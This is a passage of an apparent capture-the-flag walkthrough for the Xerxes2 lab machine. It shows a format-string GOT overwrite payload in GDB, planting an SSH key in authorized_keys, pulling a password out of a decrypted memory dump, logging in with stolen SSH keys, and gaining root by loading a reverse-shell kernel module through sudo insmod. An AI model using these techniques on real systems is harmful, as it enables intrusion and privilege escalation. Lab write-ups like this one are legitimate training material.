(gdb) r ",>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>#" < write
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/bf
Program received signal SIGSEGV, Segmentation fault.
0xb7ea29d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
(gdb) p/x $edx
$11 = 0x15

If i manage to change an address of the got table, when the program calls the function, it will point to my code.

We will try to overwrite the printf function address and redirect to the libc system function.

We want to run system(buf) instead of printf(buf).

I write to the file: printf '\x54\x9a\x04\x08_%%16$n' > /tmp/write

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/bf ",>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>#" < /tmp/write
Program received signal SIGSEGV, Segmentation fault.
0x00000005 in ?? ()

I connected and i uploaded my id_rsa.pub to the /home/polito/.ssh/authorized_keys file in order to normally connect as polito via ssh.

Forensics part

Under home directory of polito i found an interesting pdf.

I scanned the qrcode with my phone and i got the message Xerxes is watching you.... Just another troll...

I checked with file command how it is recognized by the system and it reports that it is a boot sector.

$file polito.pdf
polito.pdf: x86 boot sector, code offset 0xe0

Let's try to boot it

$qemu polito.pdf

Let's decrypt the dump and see what is it. gpg -o decrypt --decrypt dump.gpg

It seems to be a memory dump. So it must include juicy stuff. Let's try to find pass string inside it. strings decrypt | grep "pass"

Yay i found the exact command that decrypts the file that is located in /opt/backup/korenchkin. openssl enc -d -salt -aes-256-cbc -pass pass:c2hvZGFu -in /opt/backup/korenchkin.tar.enc -out /home/polito/koren.tar

Then i am decompressing it: tar xvf /home/polito/koren.tar

It contains the ssh keys of korenchkin user. Let's try to log in as this user: ssh [email protected] -i id_rsa

The home directory is empty. I tried to find anything interesting under /var/mail/korenchkin but no luck. Then, i tried to find if i can run any command as root.

$sudo -l
Matching Defaults entries for korenchkin on this host:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User korenchkin may run the following commands on this host:
(root) NOPASSWD: /sbin/insmod, (root) /sbin/rmmod

So i have to find a way to load a kernel module and take access as root.

I found https://github.com/maK-/reverse-shell-access-kernel-module.

I downloaded the source to xerxes machine and i run make command in order the kernel module to be compiled.

Then i run in xerxes2:

$sudo /sbin/insmod maK_it.ko
The kernel module is loaded and is waiting for our interaction.